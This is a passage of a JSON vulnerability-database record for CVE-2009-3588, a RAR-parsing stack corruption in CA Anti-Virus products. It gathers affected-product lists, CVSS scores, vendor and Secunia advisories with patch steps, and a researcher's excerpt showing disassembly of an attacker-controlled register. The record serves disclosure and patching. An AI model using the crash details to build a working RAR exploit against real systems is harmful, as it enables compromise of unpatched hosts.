"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2007:8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_integrated_threat_management:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:arcserve_backup:r12.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:arcserve_backup:r12.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:linux:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller",
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 1.0
},
"cve": "CVE-2009-3588",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2009-3588",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-41034",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2009-3588",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200910-200",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-41034",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service via a crafted RAR archive file that triggers stack corruption, a different vulnerability than CVE-2009-3587. This vulnerability CVE-2009-3587 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) There is a possibility of being put into a state. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. \nAn attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. \nThe issues affect the Anti-Virus engine with versions prior to \u0027arclib\u0027 8.1.4.0. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. \nCA20091008-01: Security Notice for CA Anti-Virus Engine\n\n\nIssued: October 8, 2009\n\n\nCA\u0027s support is alerting customers to multiple security risks \nassociated with CA Anti-Virus Engine. Vulnerabilities exist in \nthe arclib component that can allow a remote attacker to cause a \ndenial of service, or to cause heap corruption and potentially \nfurther compromise a system. CA has issued fixes to address the \nvulnerabilities. An attacker can create a \nmalformed RAR archive file that results in heap corruption and \nallows the attacker to cause a denial of service or possibly \nfurther compromise the system. An attacker can create a \nmalformed RAR archive file that results in stack corruption and \nallows the attacker to cause a denial of service. \n\n\nRisk Rating\n\nMedium\n\n\nPlatform\n\nWindows\nUNIX\nLinux\nSolaris\nMac OS X\nNetware\n\n\nAffected Products\n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1\nCA Anti-Virus 2007 (v8)\nCA Anti-Virus 2008\nCA Anti-Virus 2009\nCA Anti-Virus Plus 2009\neTrust EZ Antivirus r7.1\nCA Internet Security Suite 2007 (v3)\nCA Internet Security Suite 2008\nCA Internet Security Suite Plus 2008\nCA Internet Security Suite Plus 2009\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) 8.1\nCA Threat Manager Total Defense\nCA Gateway Security r8.1\nCA Protection Suites r2\nCA Protection Suites r3\nCA Protection Suites r3.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 1.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.1\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11.1\nCA ARCserve Backup r11.5 on Windows\nCA ARCserve Backup r12 on Windows\nCA ARCserve Backup r12.0 SP1 on Windows\nCA ARCserve Backup r12.0 SP 2 on Windows\nCA ARCserve Backup r12.5 on Windows\nCA ARCserve Backup r11.1 Linux\nCA ARCserve Backup r11.5 Linux\nCA ARCserve for Windows Client Agent\nCA ARCserve for Windows Server component\nCA eTrust Intrusion Detection 2.0 SP1\nCA eTrust Intrusion Detection 3.0\nCA eTrust Intrusion Detection 3.0 SP1\nCA Common Services (CCS) r3.1\nCA Common Services (CCS) r11\nCA Common Services (CCS) r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1\n\n\nNon-Affected Products\n\nCA Anti-Virus engine with arclib version 8.1.4.0 or later \ninstalled\n\n\nHow to determine if the installation is affected\n\nFor products on Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated below, the \n installation is vulnerable. \n\n File Name File Version\n arclib.dll 8.1.4.0\n\n*For eTrust Intrusion Detection 2.0, the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. If the version is less than 8.1.4.0, the \ninstallation is vulnerable. \n\nExample compver utility output:\n\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 8.1.4.0\n ... (followed by other components)\n \n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\n Operating System File name\n Solaris libarclib.so\n Linux libarclib.so\n Mac OS X arclib.bundle\n\n\nSolution\n\nCA released arclib 8.1.4.0 on August 12 2009. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.0: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.1: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11.1: apply fix # RO11964. \n\nCA Common Services (CCS) r3.1: apply fix # RO11954. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \n32bit: apply fix # RO10663. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nIA64: apply fix # RO10664. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nAMD64: apply fix # RO10665. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr1.1: apply fix # RO10999. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr8.0: apply fix # RO10999. \n\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: \napply fix # RO11000. \n\nCA Gateway Security r8.1: RO10999. \n\nCA ARCserve for Windows Server component installed on a 64 bit \nmachine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 \n(AMD64). \n\nCA ARCserve for Windows Server component installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Windows Client Agent installed on a 64 bit \nmachine: apply fix # RO10664 (IA64) or RO10665 (AMD64). \n\nCA ARCserve for Windows Client Agent installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Linux Server r11.5: apply fix # RO10729. \n\nCA ARCserve for Linux:\n\n1. Download RO10729.tar.Z from RO10729 into a temporary location \n /tmp/RO10729\n\n2. Uncompress and untar RO10729.tar.Z as follows:\n uncompress RO10729.tar.Z\n tar -xvf RO10729.tar\n The new \"libarclib.so\" will be extracted to /tmp/RO10729\n\n3. Change the directory to $CAIGLBL0000/ino/config as follows:\n cd $CAIGLBL0000/ino/config\n\n4. Rename \"libarclib.so\" to \"libarclib.so.RO10729\" as follows:\n mv libarclib.so libarclib.so.RO10729\n\n5. Copy the new libarclib.so as follows:\n cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/\n\n6. chmod +x $CAIGLBL0000/ino/config/libarclib.so\n\n7. Stop the common agent (caagent stop)\n\n8. Change the directory to ARCserve common agent directory \n (typically /opt/CA/BABcmagt)\n cd /opt/CA/BABcmagt\n Note: To find out the agent home directory run the following \n command:\n dirname \u0027ls -l /usr/bin/caagent |cut -f2 -d\"\u003e\"\u0027\n\n9. Save a copy of libarclib.so\n cp -p libarclib.so libarclib.so.RO10729\n\n10. Copy over the new libarclib.so as follows:\n cp $/tmp/RO10729/libarclib.so. \n\n11. Start the common agent (caagent start)\n\n12. Repeat steps (7-11) on all remote Linux client agents\u0027 \n installations. \n\n13. rm -rf /tmp/RO10729\n\n\nWorkaround\n\nDo not open email attachments or download files from untrusted \nsources. \n\n\nIf additional information is required, please contact CA Support \nat http://support.ca.com/. \n\n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Anti-Virus Engine RAR Processing Two Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36976\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36976/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in multiple CA products, which\ncan be exploited by malicious people to cause a DoS (Denial of\nService) or to potentially compromise a vulnerable system. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nPlease see the vendor\u0027s advisory for detailed instructions on\napplying patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Thierry Zoller. \n\nORIGINAL ADVISORY:\nCA20091008-01:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Background\n~~~~~~~~~~~~~\nQuote: \n\"CA is one of the world\u0027s largest IT management software providers. \nWe serve more than 99% of Fortune 1000 companies, as well as government \nentities, educational institutions and thousands of other companies \nin diverse industries worldwide\" \n\n\"CA Anti-Virus for the Enterprise is the next generation in comprehensive \nanti-virus security for business PCs, servers and PDAs. It combines \nproactive protection against malware with new, powerful management \nfeatures that stop and remove malicious code before it enters your \nnetwork, reducing system downtime\"\n\n\nII. \n\nAttacker has control over EBX :\n\nBasic Block:\n 6e4305b0 mov cl,byte ptr [ebx]\n Tainted Input Operands: ebx\n 6e4305b2 add edi,28h\n 6e4305b5 push edi\n 6e4305b6 lea edx,[esp+14h]\n 6e4305ba mov byte ptr [esp+14h],cl\n Tainted Input Operands: cl\n 6e4305be inc ebx\n Tainted Input Operands: ebx\n 6e4305bf push edx\n 6e4305c0 mov ecx,esi\n 6e4305c2 mov dword ptr [esp+1ch],ebx\n Tainted Input Operands: ebx\n 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)\n \n \n\nIII. \nDue to the nature of Anti-virus products, the attack vectors can be near endless. An attack\ncould be done over the way of an E-mail message carrying an RAR attachment (of a file\nrecognised as being RAR), USB, CD, Network data etc. \n\nPlease note that this is a general problem and not exclusive to Computer Associates. \n\n\nIV. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD.MM.YYYY\n11.05.2009 - Reported CVE-2009-3587 \n03.06.2009 - Reported CVE-2009-3588\n09.10.2009 - CA releases advisory\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n13.10.2009 - G-SEC releases advisory\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3588"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-3588",
"trust": 3.0
},
{
"db": "BID",
"id": "36653",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "36976",
"trust": 2.6
},
{
"db": "VUPEN",
"id": "ADV-2009-2852",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1022999",
"trust": 2.5
},
{
"db": "XF",
"id": "53698",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-41034",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81918",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81885",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81986",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"id": "VAR-200910-0097",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
}
],
"trust": 0.01
},
"last_update_date": "2024-05-18T22:56:12.481000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "218878",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/36653"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1022999"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/36976"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/2852"
},
{
"trust": 2.2,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/507068/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53698"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3588"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/53698"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3588"
},
{
"trust": 0.4,
"url": "http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/507101"
},
{
"trust": 0.3,
"url": "/archive/1/507068"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3587"
},
{
"trust": 0.1,
"url": "http://support.ca.com/."
},
{
"trust": 0.1,
"url": "https://www.g-sec.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36976/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-10-13T00:00:00",
"db": "VULHUB",
"id": "VHN-41034"
},
{
"date": "2009-10-09T00:00:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"date": "2009-10-12T20:41:50",
"db": "PACKETSTORM",
"id": "81918"
},
{
"date": "2009-10-12T11:21:41",
"db": "PACKETSTORM",
"id": "81885"
},
{
"date": "2009-10-14T23:09:22",
"db": "PACKETSTORM",
"id": "81986"
},
{
"date": "2009-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"date": "2009-10-13T10:30:00.627000",
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-41034"
},
{
"date": "2009-10-13T15:38:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"date": "2024-05-17T17:26:30.777000",
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Anti-Virus In the engine arclib Service disruption in components (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 0.6
}
}
VAR-200910-0352
